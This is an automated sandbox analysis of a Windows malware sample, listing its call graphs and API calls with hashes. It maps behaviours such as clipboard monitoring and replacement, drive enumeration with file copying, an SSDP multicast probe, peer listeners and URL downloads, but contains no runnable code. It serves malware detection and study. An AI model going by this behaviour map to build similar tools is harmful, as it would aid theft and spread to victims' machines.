5165->5167 5169 40e596 5165->5169 5168 40ab60 __aligned_recalloc_base 3 API calls 5166->5168 5167->5166 5168->5163 5169->5167 5206 40e9f0 5170->5206 5173 40e870 5211 40ecc0 5173->5211 5178 40ee20 6 API calls 5179 40e8c7 5178->5179 5185 40e4b2 5179->5185 5228 40eae0 5179->5228 5182 40e8ff 5182->5185 5233 40e990 5182->5233 5183 40eae0 6 API calls 5183->5182 5185->5105 5186 40d470 5185->5186 5249 40d3e0 5186->5249 5193 40d25d 5189->5193 5190 40d263 lstrlenA 5191 40d276 5190->5191 5190->5193 5191->5163 5191->5164 5193->5190 5193->5191 5194 40a950 __aligned_recalloc_base 7 API calls 5193->5194 5196 40ab60 __aligned_recalloc_base 3 API calls 5193->5196 5197 405740 5193->5197 5201 4056f0 5193->5201 5194->5193 
5196->5193 5198 405757 MultiByteToWideChar 5197->5198 5199 40574a lstrlenA 5197->5199 5200 40577c 5198->5200 5199->5198 5200->5193 5202 4056fb 5201->5202 5203 405701 lstrlenA 5202->5203 5204 405740 2 API calls 5202->5204 5205 405737 5202->5205 5203->5202 5204->5202 5205->5193 5207 40ea16 5206->5207 5208 40e49d 5207->5208 5209 40ea93 lstrcmpiW 5207->5209 5210 40eaab SysFreeString 5207->5210 5208->5100 5208->5173 5209->5207 5209->5210 5210->5207 5213 40ece6 5211->5213 5212 40e88b 5212->5185 5223 40ee20 5212->5223 5213->5212 5214 40ed73 lstrcmpiW 5213->5214 5215 40edf3 SysFreeString 5214->5215 5216 40ed86 5214->5216 5215->5212 5217 40e990 2 API calls 5216->5217 5219 40ed94 5217->5219 5218 40ede5 5218->5215 5219->5215 5219->5218 5220 40edc3 lstrcmpiW 5219->5220 5221 40edd5 5220->5221 5222 40eddb SysFreeString 5220->5222 5221->5222 5222->5218 5224 40e990 2 API calls 5223->5224 5225 40ee3b 5224->5225 5226 40ecc0 6 API calls 5225->5226 5227 40e8a9 5225->5227 5226->5227 5227->5178 5227->5185 5229 40e990 2 API calls 5228->5229 5231 40eafb 5229->5231 5230 40e8e5 5230->5182 5230->5183 5231->5230 5237 40eb60 5231->5237 5234 40e9b6 5233->5234 5235 40e9cd 5234->5235 5236 40e9f0 2 API calls 5234->5236 5235->5185 5236->5235 5239 40eb86 5237->5239 5238 40ec9d 5238->5230 5239->5238 5240 40ec13 lstrcmpiW 5239->5240 5241 40ec93 SysFreeString 5240->5241 5242 40ec26 5240->5242 5241->5238 5243 40e990 2 API calls 5242->5243 5245 40ec34 5243->5245 5244 40ec85 5244->5241 5245->5241 5245->5244 5246 40ec63 lstrcmpiW 5245->5246 5247 40ec75 5246->5247 5248 40ec7b SysFreeString 5246->5248 5247->5248 5248->5244 5253 40d3ed 5249->5253 5250 40d408 SysFreeString 5250->5105 5251 40a990 9 API calls 5251->5253 5252 40d390 _vscprintf wvsprintfA 5252->5253 5253->5250 5253->5251 5253->5252 5255 40b41c socket 5254->5255 5256 40b409 gethostbyname 5254->5256 5255->5111 5255->5112 5256->5255 5257->5111 5258->5118 5260 40ef47 5259->5260 5261 40f014 InternetConnectA 5259->5261 5260->5124 5260->5125 5262 40f194 
InternetCloseHandle 5261->5262 5263 40f04d HttpOpenRequestA 5261->5263 5262->5260 5264 40f083 HttpAddRequestHeadersA HttpSendRequestA 5263->5264 5265 40f187 InternetCloseHandle 5263->5265 5266 40f17a InternetCloseHandle 5264->5266 5267 40f0cd 5264->5267 5265->5262 5266->5265 5268 40f0e4 InternetReadFile 5267->5268 5269 40f111 5267->5269 5270 40a990 9 API calls 5267->5270 5268->5267 5268->5269 5269->5266 5271 40f12c memcpy 5270->5271 5271->5267 5280 407417 5272->5280 5273 4075eb 5274 4075f4 SysFreeString 5273->5274 5275 4073bb SysFreeString 5273->5275 5274->5275 5275->4565 5276 40ab60 __aligned_recalloc_base 3 API calls 5276->5273 5277 407670 CoCreateInstance 5277->5280 5278 407566 SysAllocString 5279 407432 5278->5279 5278->5280 5279->5273 5279->5276 5280->5277 5280->5278 5280->5279 5282 40c87a 5281->5282 5283 40c87e 5281->5283 5282->4571 5285 40c830 CryptAcquireContextW 5283->5285 5286 40c86b 5285->5286 5287 40c84d CryptGenRandom CryptReleaseContext 5285->5287 5286->5282 5287->5286 5288->4589 5340 40b780 gethostname 5289->5340 5292 40b869 5292->4589 5294 40b87c strcmp 5294->5292 5295 40b891 5294->5295 5344 40b3d0 inet_ntoa 5295->5344 5297 40b89f strstr 5298 40b8f0 5297->5298 5299 40b8af 5297->5299 5345 40b3d0 inet_ntoa 5298->5345 5357 40b3d0 inet_ntoa 5299->5357 5302 40b8bd strstr 5302->5292 5304 40b8cd 5302->5304 5303 40b8fe strstr 5305 40b90e 5303->5305 5306 40b94f 5303->5306 5358 40b3d0 inet_ntoa 5304->5358 5359 40b3d0 inet_ntoa 5305->5359 5346 40b3d0 inet_ntoa 5306->5346 5310 40b95d strstr 5313 40b96d 5310->5313 5314 40b9ae EnterCriticalSection 5310->5314 5311 40b8db strstr 5311->5292 5311->5298 5312 40b91c strstr 5312->5292 5315 40b92c 5312->5315 5361 40b3d0 inet_ntoa 5313->5361 5317 40b9c6 5314->5317 5360 40b3d0 inet_ntoa 5315->5360 5325 40b9f1 5317->5325 5363 40df20 NtQuerySystemTime RtlTimeToSecondsSince1980 5317->5363 5319 40b97b strstr 5319->5292 5321 40b98b 5319->5321 5320 40b93a strstr 5320->5292 5320->5306 5362 40b3d0 inet_ntoa 5321->5362 5324 40baea 
LeaveCriticalSection 5324->5292 5325->5324 5327 40a740 7 API calls 5325->5327 5326 40b999 strstr 5326->5292 5326->5314 5328 40ba35 5327->5328 5328->5324 5347 40df20 NtQuerySystemTime RtlTimeToSecondsSince1980 5328->5347 5330 40ba53 5331 40ba80 5330->5331 5332 40ba76 Sleep 5330->5332 5334 40baa5 5330->5334 5333 40ab60 __aligned_recalloc_base 3 API calls 5331->5333 5332->5330 5333->5334 5334->5324 5348 40b530 5334->5348 5337 40b530 14 API calls 5336->5337 5338 40b523 LeaveCriticalSection 5337->5338 5338->4594 5339->4599 5341 40b7a7 gethostbyname 5340->5341 5342 40b7c3 5340->5342 5341->5342 5342->5292 5343 40b3d0 inet_ntoa 5342->5343 5343->5294 5344->5297 5345->5303 5346->5310 5347->5330 5349 40b544 5348->5349 5356 40b53f 5348->5356 5350 40a950 __aligned_recalloc_base 7 API calls 5349->5350 5352 40b558 5350->5352 5351 40b5b4 CreateFileW 5353 40b603 InterlockedExchange 5351->5353 5354 40b5d7 WriteFile FlushFileBuffers CloseHandle 5351->5354 5352->5351 5352->5356 5355 40ab60 __aligned_recalloc_base 3 API calls 5353->5355 5354->5353 5355->5356 5356->5324 5357->5302 5358->5311 5359->5312 5360->5320 5361->5319 5362->5326 5363->5325 5367 40dcdd 5364->5367 5365 40dc13 5365->4606 5365->4607 5366 40dd01 WaitForSingleObject 5366->5367 5368 40dd1c CloseHandle 5366->5368 5367->5365 5367->5366 5368->5367 5370 40bdd3 WaitForSingleObject 5369->5370 5371 40be01 5370->5371 5372 40bdeb InterlockedDecrement 5370->5372 5373 40bdfa 5372->5373 5373->5370 5374 40b510 16 API calls 5373->5374 5374->5373 5436 4013b0 5375->5436 5377 40dfdd 5378 40e060 5377->5378 5380 40dff7 InterlockedExchangeAdd 5377->5380 5381 40e03b WaitForSingleObject 5377->5381 5449 40bbb0 EnterCriticalSection 5377->5449 5454 40bed0 5377->5454 5380->5377 5380->5381 5381->5377 5382 40e054 5381->5382 5457 401330 5382->5457 5387 401f92 5386->5387 5388 402008 5386->5388 5389 401f97 WSAGetOverlappedResult 5387->5389 5536 401d60 5387->5536 5389->5387 5390 401fb9 WSAGetLastError 5389->5390 5390->5387 5392 401fd3 
GetQueuedCompletionStatus 5392->5387 5392->5388 5577 401470 5393->5577 5395 40e084 5396 40e0b2 5395->5396 5397 40e095 WaitForSingleObject 5395->5397 5398 401330 8 API calls 5397->5398 5399 40e0af 5398->5399 5399->5396 5592 4021b0 5400->5592 5403 40d9c2 5404 40d9a5 WaitForSingleObject 5596 401600 5404->5596 5408 401ac9 5407->5408 5409 40194d WSAWaitForMultipleEvents 5407->5409 5410 4019f0 GetTickCount 5409->5410 5411 40196a WSAEnumNetworkEvents 5409->5411 5412 401a43 GetTickCount 5410->5412 5413 401a05 EnterCriticalSection 5410->5413 5411->5410 5426 401983 5411->5426 5416 401ab5 WaitForSingleObject 5412->5416 5417 401a4e EnterCriticalSection 5412->5417 5414 401a16 5413->5414 5415 401a3a LeaveCriticalSection 5413->5415 5421 401a29 LeaveCriticalSection 5414->5421 5660 401820 5414->5660 5415->5416 5416->5408 5416->5409 5419 401aa1 LeaveCriticalSection GetTickCount 5417->5419 5420 401a5f InterlockedExchangeAdd 5417->5420 5418 401992 accept 5418->5410 5418->5426 5419->5416 5678 40df20 NtQuerySystemTime RtlTimeToSecondsSince1980 5420->5678 5421->5416 5425 401a72 5425->5419 5425->5420 5679 40b4f0 shutdown closesocket 5425->5679 5426->5410 5426->5418 5428 4019e9 5426->5428 5640 4022c0 5426->5640 5429 401cf0 7 API calls 5428->5429 5429->5410 5435 40d934 5430->5435 5431 40bbb0 5 API calls 5431->5435 5432 40d950 WaitForSingleObject 5434 40d975 5432->5434 5432->5435 5435->5431 5435->5432 5435->5434 5693 40d550 InterlockedExchangeAdd 5435->5693 5437 40a740 7 API calls 5436->5437 5438 4013bb CreateEventA socket 5437->5438 5439 4013f2 5438->5439 5440 4013fd 5438->5440 5441 401330 8 API calls 5439->5441 5442 401401 bind 5440->5442 5443 401462 5440->5443 5444 4013f8 5441->5444 5445 401444 CreateThread 5442->5445 5446 401434 5442->5446 5443->5377 5444->5440 5445->5443 5467 401100 5445->5467 5447 401330 8 API calls 5446->5447 5448 40143a 5447->5448 5448->5377 5450 40bbe7 LeaveCriticalSection 5449->5450 5451 40bbcf 5449->5451 5450->5377 5452 40c870 3 API calls 5451->5452 5453 40bbda 
5452->5453 5453->5450 5496 40be30 5454->5496 5458 401339 5457->5458 5465 40139b 5457->5465 5459 401341 SetEvent WaitForSingleObject CloseHandle 5458->5459 5458->5465 5460 401369 5459->5460 5466 40138b 5459->5466 5463 40ab60 GetCurrentProcessId HeapValidate RtlFreeHeap __aligned_recalloc_base 5460->5463 5460->5466 5462 401395 5464 40ab60 __aligned_recalloc_base 3 API calls 5462->5464 5463->5460 5464->5465 5465->5378 5535 40b4f0 shutdown closesocket 5466->5535 5468 401115 ioctlsocket 5467->5468 5469 4011e4 5468->5469 5474 40113a 5468->5474 5470 40ab60 __aligned_recalloc_base 3 API calls 5469->5470 5472 4011ea 5470->5472 5471 4011cd WaitForSingleObject 5471->5468 5471->5469 5473 40a990 9 API calls 5473->5474 5474->5471 5474->5473 5475 401168 recvfrom 5474->5475 5476 4011ad InterlockedExchangeAdd 5474->5476 5475->5471 5475->5474 5478 401000 5476->5478 5479 401014 5478->5479 5480 40103b 5479->5480 5481 40a740 7 API calls 5479->5481 5489 40df20 NtQuerySystemTime RtlTimeToSecondsSince1980 5480->5489 5481->5480 5483 40105b 5490 401580 5483->5490 5485 4010ec 5485->5474 5486 4010a3 IsBadReadPtr 5487 401071 5486->5487 5487->5485 5487->5486 5488 4010d8 memmove 5487->5488 5488->5487 5489->5483 5491 401592 5490->5491 5492 4015a5 memcpy 5490->5492 5494 40a990 9 API calls 5491->5494 5493 4015c1 5492->5493 5493->5487 5495 40159f 5494->5495 5495->5492 5497 40c8b0 3 API calls 5496->5497 5498 40be3b 5497->5498 5499 40be57 lstrlenA 5498->5499 5500 40cb40 7 API calls 5499->5500 5501 40be8d 5500->5501 5502 40beb8 5501->5502 5507 40dfa0 5501->5507 5510 40d6b0 5501->5510 5502->5377 5503 40beac 5504 40ab60 __aligned_recalloc_base 3 API calls 5503->5504 5504->5502 5515 401200 5507->5515 5509 40dfc2 5509->5503 5531 40d710 5510->5531 5513 40d6de 5513->5503 5514 40d710 send 5514->5513 5516 40121d 5515->5516 5529 401314 5515->5529 5517 40a950 __aligned_recalloc_base 7 API calls 5516->5517 5516->5529 5518 401247 memcpy htons 5517->5518 5519 4012ed 5518->5519 5520 401297 sendto 5518->5520 5521 
Call graph (node list of the interactive graph, flattened by extraction; functions are given by address with the APIs the graph attributes to them)
• 401ae0 / 401c50 / 401cf0: WSASend, WSARecv, WSAGetLastError, Sleep (retry after a failed send/receive), InterlockedIncrement, InterlockedDecrement, InterlockedExchangeAdd
• 401d74 / 401ef2: InterlockedExchange, InterlockedDecrement, setsockopt, closesocket; 40df20: NtQuerySystemTime, RtlTimeToSecondsSince1980
• 401498: CreateEventA, socket, htons, setsockopt, bind, CreateThread
• 401600: EnterCriticalSection, LeaveCriticalSection, SetEvent, PostQueuedCompletionStatus, CloseHandle, WSACloseEvent, DeleteCriticalSection; 40b4f0: shutdown, closesocket
• 402020: GetSystemInfo, InitializeCriticalSection, CreateEventA, CreateIoCompletionPort, WSASocketA, setsockopt, htons, bind, listen, WSACreateEvent, WSAEventSelect; 40dbe0 (330 API calls) called in a loop afterwards
• 402326: getpeername, CreateIoCompletionPort, InterlockedExchange, InitializeCriticalSection, InterlockedIncrement; 4021e0: EnterCriticalSection, LeaveCriticalSection
• 40d840: socket, htons, connect; 40b3d0: inet_ntoa; 40bc00: EnterCriticalSection, LeaveCriticalSection; 40c460: lstrlenA; 40c7eb: memcmp
• 405ef0 / 405fe0 / 4060a0: EnterCriticalSection, memcpy, LeaveCriticalSection; 406251: CreateFileW, WriteFile, FlushFileBuffers, CloseHandle
• 407840 / 40f4b0: Sleep, wsprintfA, DeleteUrlCacheEntry, InternetOpenA, InternetOpenUrlA, HttpQueryInfoA, InternetCloseHandle
• 4058c9: memset, GetModuleHandleW, Sleep, GetTickCount, wsprintfW, RegisterClassExW, CreateWindowExW, GetMessageA, TranslateMessage, DispatchMessageA, ExitThread
• 4059b0: GetWindowLongW, SetWindowLongW, SetClipboardViewer, ChangeClipboardChain, RegisterRawInputDevices, IsClipboardFormatAvailable, OpenClipboard, GetClipboardData, GlobalLock, GlobalUnlock, CloseClipboard, SendMessageA, DefWindowProcA
• 404970 / 4048a0: lstrlenW, StrStrW (repeated), iswalpha, iswdigit, lstrlenA, GlobalAlloc, GlobalLock, memcpy, GlobalUnlock, OpenClipboard, EmptyClipboard, SetClipboardData, CloseClipboard; 405680 / 4057f0 / 4057a0: lstrlenW, lstrcpynW, lstrlenA
• 406fa0 / 4063e0 / 406300 / 406360: GetLogicalDrives, RegOpenKeyExW, RegQueryValueExW, RegCloseKey, GetDriveTypeW, QueryDosDeviceW, StrCmpNW, lstrcpyW, GetVolumeInformationW, GetDiskFreeSpaceExW, _aulldiv, wsprintfW, Sleep, ExitThread; 40f1f0: CreateFileW, GetFileSize, CloseHandle
• 4068e0: _chkstk, PathFileExistsW, SetFileAttributesW, DeleteFileW, CreateDirectoryW, CopyFileW, FindFirstFileW, FindNextFileW, FindClose, lstrcmpW, lstrcmpiW, PathMatchSpecW, wsprintfW, MoveFileExW; 406660: CoInitialize, CoCreateInstance, wsprintfW; 4064a0: InternetOpenUrlW, CreateFileW, InternetReadFile, WriteFile, CloseHandle, wsprintfW, DeleteFileW, InternetCloseHandle; 4067a0: CreateDirectoryW, wsprintfW, FindFirstFileW, lstrcmpW, MoveFileExW, FindNextFileW, FindClose, RemoveDirectoryW
• 40eba1: lstrcmpiW, SysFreeString; 40f908 / 40f910: RtlUnwind, NtQueryVirtualMemory; 40d9d0 / 40c570 / 40c670: IsBadReadPtr, memcpy, memmove; 40792a: ExitThread
• 40ab60 (__aligned_recalloc_base): GetCurrentProcessId, HeapValidate, RtlFreeHeap

Control-flow Graph (function 0040E190)
• Basic blocks and edges: 263 40e190-40e1b7 socket 264 40e2f1-40e2f5 263->264 265 40e1bd-40e285 htons inet_addr setsockopt call 40b430 bind lstrlenA sendto ioctlsocket 263->265 266 40e2f7-40e2fd 264->266 267 40e2ff-40e305 264->267 270 40e28b-40e292 265->270 266->267 271 40e294-40e2a3 call 40e310 270->271 272 40e2e5-40e2e9 call 40b4f0 270->272 275 40e2a8-40e2b0 271->275 276 40e2ee 272->276 277 40e2b2 275->277 278 40e2b4-40e2e3 call 40a990 275->278 276->264 277->272 278->270
APIs
• socket.WS2_32(00000002,00000002,00000011), ref: 0040E1AA
• htons.WS2_32(0000076C), ref: 0040E1E0
• inet_addr.WS2_32(239.255.255.250), ref: 0040E1EF
• setsockopt.WS2_32(000000FF,0000FFFF,00000020,00000001,00000001), ref: 0040E20D
  • Part of subcall function 0040B430: htons.WS2_32(00000050), ref: 0040B45D
  • Part of subcall function 0040B430: socket.WS2_32(00000002,00000001,00000000), ref: 0040B47D
  • Part of subcall function 0040B430: connect.WS2_32(000000FF,?,00000010), ref: 0040B496
  • Part of subcall function 0040B430: getsockname.WS2_32(000000FF,?,00000010), ref: 0040B4C8
• bind.WS2_32(000000FF,?,00000010), ref: 0040E243
• lstrlenA.KERNEL32(X#A,00000000,?,00000010), ref: 0040E25C
• sendto.WS2_32(000000FF,X#A,00000000), ref: 0040E26B
• ioctlsocket.WS2_32(000000FF,8004667E,00000001), ref: 0040E285
  • Part of subcall function 0040E310: recvfrom.WS2_32(000000FF,?,00000400,00000000,00000000,00000000), ref: 0040E35E
  • Part of subcall function 0040E310: Sleep.KERNEL32(000003E8), ref: 0040E36E
  • Part of subcall function 0040E310: StrCmpNIA.SHLWAPI(?,HTTP/1.1 200 OK,0000000F), ref: 0040E38B
  • Part of subcall function 0040E310: StrStrIA.SHLWAPI(?,LOCATION: ), ref: 0040E3A1
  • Part of subcall function 0040E310: StrChrA.SHLWAPI(?,0000000D), ref: 0040E3CE
Memory Dump Source
• Source File: 00000002.00000002.2003370192.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2003359211.0000000000400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2003382841.0000000000410000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2003395330.0000000000414000.00000004.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_sysppvrdnvs.jbxd
Similarity
• API ID: htonssocket$Sleepbindconnectgetsocknameinet_addrioctlsocketlstrlenrecvfromsendtosetsockopt
• String ID: 239.255.255.250$X#A
• API String ID: 726339449-2206458040
• Opcode ID: d4aae0188a0692a386eab894faa05248931f68ac7139597ebba67cfde0a765f4
• Instruction ID: e8e0ae0e245dd7c097b927a75a8676c49a2f7ecfee9f68fb0cb72d84dadb0e27
• Opcode Fuzzy Hash: d4aae0188a0692a386eab894faa05248931f68ac7139597ebba67cfde0a765f4
• Instruction Fuzzy Hash: 7F4119B4E00208ABDB04DFE4D989BEEBBB5EF48304F108569F505B7390E7B55A44CB59

Control-flow Graph (function 00402020)
• Basic blocks and edges: 308 402020-402032 call 40a740 311 402038-402070 GetSystemInfo InitializeCriticalSection CreateEventA 308->311 312 4021aa-4021ae 308->312 313 402076-402089 CreateIoCompletionPort 311->313 314 40219f-4021a8 call 401600 311->314 313->314 315 40208f-402099 call 40dbb0 313->315 314->312 315->314 320 40209f-4020b7 WSASocketA 315->320 320->314 321 4020bd-402120 setsockopt htons bind 320->321 321->314 322 402126-402138 listen 321->322 322->314 323 40213a-402145 WSACreateEvent 322->323 323->314 324 402147-402157 WSAEventSelect 323->324 324->314 325 402159-40215f 324->325 326 402161-402171 call 40dbe0 325->326 327 40217f-40218f call 40dbe0 325->327 331 402176-40217d 326->331 330 402194-40219e 327->330 331->326 331->327
APIs
• GetSystemInfo.KERNEL32(?,?), ref: 00402043
• InitializeCriticalSection.KERNEL32(00000020), ref: 00402057
• CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 00402065
• CreateIoCompletionPort.KERNEL32(000000FF,00000000,00000000,00000000), ref: 0040207E
  • Part of subcall function 0040DBB0: InitializeCriticalSection.KERNEL32(-00000004), ref: 0040DBCE
• WSASocketA.WS2_32(00000002,00000001,00000006,00000000,00000000,00000001), ref: 004020AB
• setsockopt.WS2_32 ref: 004020D1
• htons.WS2_32(?), ref: 00402101
• bind.WS2_32(?,0000FFFF,00000010), ref: 00402117
• listen.WS2_32(?,7FFFFFFF), ref: 0040212F
• WSACreateEvent.WS2_32 ref: 0040213A
• WSAEventSelect.WS2_32(?,00000000,00000008), ref: 0040214E
  • Part of subcall function 0040DBE0: EnterCriticalSection.KERNEL32(-00000004,00000000), ref: 0040DC04
  • Part of subcall function 0040DBE0: CreateThread.KERNEL32(00000000,?,00000000,?,00000000,?), ref: 0040DC5F
  • Part of subcall function 0040DBE0: GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002), ref: 0040DC9C
  • Part of subcall function 0040DBE0: GetCurrentProcess.KERNEL32(00000000,00000000), ref: 0040DCA7
  • Part of subcall function 0040DBE0: DuplicateHandle.KERNEL32(00000000), ref: 0040DCAE
  • Part of subcall function 0040DBE0: LeaveCriticalSection.KERNEL32(-00000004), ref: 0040DCC2
Memory Dump Source
• Source File: 00000002.00000002.2003370192.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2003359211.0000000000400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2003382841.0000000000410000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2003395330.0000000000414000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_sysppvrdnvs.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CreateCriticalSection$Event$CurrentInitializeProcess$CompletionDuplicateEnterHandleInfoLeavePortSelectSocketSystemThreadbindhtonslistensetsockopt
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1603358586-0
                                                                                                                                    • Opcode ID: 619c20c401e2b3364d0528cdac8d914a84e1654cc4efe0891effe822260bbcd9
                                                                                                                                    • Instruction ID: 7304e093e5df1f4af0f3941d52a0ba2ce6ba101da239ecb0b9d238ba0c2be26e
                                                                                                                                    • Opcode Fuzzy Hash: 619c20c401e2b3364d0528cdac8d914a84e1654cc4efe0891effe822260bbcd9
                                                                                                                                    • Instruction Fuzzy Hash: EE41B170640301ABD3209F74CC4AF5B77E4AF44720F108A2DF6A9EA2D4E7F4E545875A
                                                                                                                                    APIs
                                                                                                                                    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 004014B2
                                                                                                                                    • socket.WS2_32(00000002,00000002,00000011), ref: 004014C1
                                                                                                                                    • htons.WS2_32(?), ref: 00401508
                                                                                                                                    • setsockopt.WS2_32(?,0000FFFF), ref: 0040152A
                                                                                                                                    • bind.WS2_32(?,?,00000010), ref: 0040153B
                                                                                                                                      • Part of subcall function 00401330: SetEvent.KERNEL32(6856006A,00000000,?,0040143A,00000000,?,?,?,0040DFDD,00000000), ref: 00401346
                                                                                                                                      • Part of subcall function 00401330: WaitForSingleObject.KERNEL32(00401100,000000FF,?,0040143A,00000000,?,?,?,0040DFDD,00000000), ref: 00401352
                                                                                                                                      • Part of subcall function 00401330: CloseHandle.KERNEL32(00401100,?,0040143A,00000000,?,?,?,0040DFDD,00000000), ref: 0040135C
                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,00401100,00000000,00000000,00000000), ref: 00401569
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2003370192.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.2003359211.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.2003382841.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.2003395330.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_sysppvrdnvs.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CreateEvent$CloseHandleObjectSingleThreadWaitbindhtonssetsockoptsocket
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 4174406920-0
                                                                                                                                    • Opcode ID: 1abba91ebe41772085043db3870f7912a64bb11f4083ad92eff8d168b7687ff9
                                                                                                                                    • Instruction ID: 62ed05d6da85abd953b38b2f92cd08377c0ec6205023cd889ce16e316194a11c
                                                                                                                                    • Opcode Fuzzy Hash: 1abba91ebe41772085043db3870f7912a64bb11f4083ad92eff8d168b7687ff9
                                                                                                                                    • Instruction Fuzzy Hash: 1731F971A443016BE320DF749C46F9BB6E0AF48B10F40493DF659EB2D0D3B4D544879A
                                                                                                                                    APIs
                                                                                                                                    • GetTickCount.KERNEL32 ref: 0040D782
                                                                                                                                    • ioctlsocket.WS2_32(00000004,4004667F,00000000), ref: 0040D7A8
                                                                                                                                    • recv.WS2_32(00000004,00002710,000000FF,00000000), ref: 0040D7DF
                                                                                                                                    • GetTickCount.KERNEL32 ref: 0040D7F4
                                                                                                                                    • Sleep.KERNEL32(00000001), ref: 0040D814
                                                                                                                                    • GetTickCount.KERNEL32 ref: 0040D81A
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2003370192.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.2003359211.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.2003382841.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.2003395330.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_sysppvrdnvs.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CountTick$Sleepioctlsocketrecv
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 107502007-0
                                                                                                                                    • Opcode ID: 37a822bdddda98564e28443683f910c137df2279eb61dd0ccc6bd5f83a2e5522
                                                                                                                                    • Instruction ID: 457d80db37ae817004d1223b894239af033459ee6c7143085fc0b5fbd1cdb933
                                                                                                                                    • Opcode Fuzzy Hash: 37a822bdddda98564e28443683f910c137df2279eb61dd0ccc6bd5f83a2e5522
                                                                                                                                    • Instruction Fuzzy Hash: 13310A75D00209EFCB04DFA4D948AEEBBB0FF44315F10866AE821A7280D7749A54CB99
                                                                                                                                    APIs
                                                                                                                                    • htons.WS2_32(00000050), ref: 0040B45D
                                                                                                                                      • Part of subcall function 0040B3F0: inet_addr.WS2_32(0040B471), ref: 0040B3FA
                                                                                                                                      • Part of subcall function 0040B3F0: gethostbyname.WS2_32(?), ref: 0040B40D
                                                                                                                                    • socket.WS2_32(00000002,00000001,00000000), ref: 0040B47D
                                                                                                                                    • connect.WS2_32(000000FF,?,00000010), ref: 0040B496
                                                                                                                                    • getsockname.WS2_32(000000FF,?,00000010), ref: 0040B4C8
                                                                                                                                    Strings
                                                                                                                                    • www.update.microsoft.com, xrefs: 0040B467
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2003370192.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.2003359211.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.2003382841.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.2003395330.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_sysppvrdnvs.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: connectgethostbynamegetsocknamehtonsinet_addrsocket
                                                                                                                                    • String ID: www.update.microsoft.com
                                                                                                                                    • API String ID: 4063137541-1705189816
                                                                                                                                    • Opcode ID: f159efbcf8a01faa4036468162d002d529369f8e2320b7a0d5a4ce48e9bb38ac
                                                                                                                                    • Instruction ID: af49af799945b34e8f77a8241ecd355db6f1f506d792f0fdd03f8566860bb8e6
                                                                                                                                    • Opcode Fuzzy Hash: f159efbcf8a01faa4036468162d002d529369f8e2320b7a0d5a4ce48e9bb38ac
                                                                                                                                    • Instruction Fuzzy Hash: DB212CB4D102099BCB04DFE8D946AEEBBB4EF48300F104169E514F7390E7B45A44DBAA
                                                                                                                                    APIs
                                                                                                                                    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,0040DFDD,00000000), ref: 004013D5
                                                                                                                                    • socket.WS2_32(00000002,00000002,00000011), ref: 004013E4
                                                                                                                                    • bind.WS2_32(?,?,00000010), ref: 00401429
                                                                                                                                      • Part of subcall function 00401330: SetEvent.KERNEL32(6856006A,00000000,?,0040143A,00000000,?,?,?,0040DFDD,00000000), ref: 00401346
                                                                                                                                      • Part of subcall function 00401330: WaitForSingleObject.KERNEL32(00401100,000000FF,?,0040143A,00000000,?,?,?,0040DFDD,00000000), ref: 00401352
                                                                                                                                      • Part of subcall function 00401330: CloseHandle.KERNEL32(00401100,?,0040143A,00000000,?,?,?,0040DFDD,00000000), ref: 0040135C
                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,00401100,00000000,00000000,00000000), ref: 00401459
                                                                                                                                    Memory Dump Source
